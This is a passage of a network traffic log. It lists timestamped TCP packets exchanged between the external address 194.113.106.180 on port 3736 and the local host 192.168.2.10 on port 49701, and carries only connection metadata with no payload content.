Sep 15, 2024 15:02:27.179419994 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179464102 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179470062 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179502964 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179536104 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179544926 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179590940 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179621935 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179634094 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179653883 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179687023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179693937 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179721117 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179755926 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179763079 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179789066 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179821014 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179831982 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179852009 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179882050 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179889917 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179914951 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179949045 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179955959 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179981947 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180012941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180017948 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.180048943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180079937 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.180079937 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180115938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180150032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180155039 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.180186987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180219889 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180227995 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.180253983 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180284977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180289984 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.180320024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180352926 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180357933 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.180386066 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180428982 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.180670977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180716038 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.180881023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.180954933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181001902 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.181004047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181072950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181092024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181107044 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181118965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181132078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.181133032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181148052 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181148052 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.181174040 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.181180954 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181195021 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181209087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181220055 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.181222916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181235075 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181247950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181248903 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.181277990 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.181477070 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181510925 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181524038 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.181548119 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181591034 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.181591034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181673050 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181705952 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181714058 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.181759119 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181792974 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181802988 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.181828976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181971073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.181981087 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.182005882 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182040930 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182045937 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.182243109 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182286024 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.182295084 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182348013 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182383060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182391882 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.182415962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182454109 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.182466030 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182499886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182534933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182540894 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.182568073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182601929 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182607889 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.182636023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182672024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.182676077 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.183079958 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.183306932 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183341026 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183351994 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.183413029 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183444977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183454037 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.183480024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183511972 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183523893 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.183564901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183598042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183602095 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.183634996 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183669090 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183675051 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.183703899 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183739901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.183748960 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.184201002 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.184246063 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.184253931 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.184288979 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.184322119 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.184329033 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.184356928 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.184391022 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.184415102 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.184425116 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.184461117 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.184464931 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.186274052 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186326027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186333895 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.186362982 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186408043 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.186415911 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186459064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186508894 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.186510086 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186544895 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186578035 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186587095 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.186611891 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186651945 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.186657906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186666965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186676979 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186702013 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.186711073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.186753988 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.186763048 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187149048 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187186956 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.187294960 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187306881 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187319040 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187330961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187340975 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187344074 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.187352896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187362909 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.187400103 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.187483072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187494993 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187505960 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187516928 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187529087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.187545061 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.187570095 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.188013077 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.188208103 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188218117 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188230991 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188244104 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188246012 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.188277960 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188277960 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.188291073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188303947 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188313961 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.188314915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188328028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188342094 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.188345909 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188359976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188369036 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.188371897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.188406944 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.188985109 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189027071 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.189101934 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189237118 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189249992 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189261913 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189274073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189279079 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.189292908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189296961 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.189307928 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189320087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189330101 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.189337969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189349890 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189357042 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.189362049 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189373970 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189383984 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.189384937 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.189408064 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.190105915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190145969 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.190336943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190347910 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190360069 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190371037 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190382004 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190385103 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.190399885 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190402031 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.190414906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190433025 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190444946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190449953 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.190457106 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190469027 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.190469980 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190481901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190495014 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.190495968 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.190520048 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.191234112 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191246033 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191257954 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191277981 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.191283941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191296101 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191296101 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.191307068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191319942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191329956 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.191334963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191345930 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191354990 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.191356897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191370010 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191380024 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.191387892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.191409111 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.192169905 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192188025 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192198992 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192224026 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.192229986 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192240953 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.192241907 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192255020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192265987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192286968 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.192311049 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.192328930 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192341089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192352057 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192363024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192374945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.192382097 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.192404985 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.193156958 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193167925 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193178892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193196058 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.193217039 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.193283081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193294048 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193305016 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193315983 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193326950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193336964 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193341970 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.193348885 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193365097 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.193381071 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.193443060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193454027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.193476915 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.194057941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194097996 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.194158077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194205046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194237947 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.194288969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194300890 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194333076 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.194407940 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194418907 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194430113 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194439888 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194456100 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.194475889 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.194565058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194576979 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194586992 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194592953 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194603920 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.194622040 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.194645882 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.195183992 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.195220947 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.195292950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.195307016 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.195317984 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.195328951 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.195339918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.195350885 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.195350885 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.195377111 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.195410013 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.195415020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.195425987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.195437908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.195444107 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.195453882 CEST	3736	49701	194.113.106.180	192.168.2.10
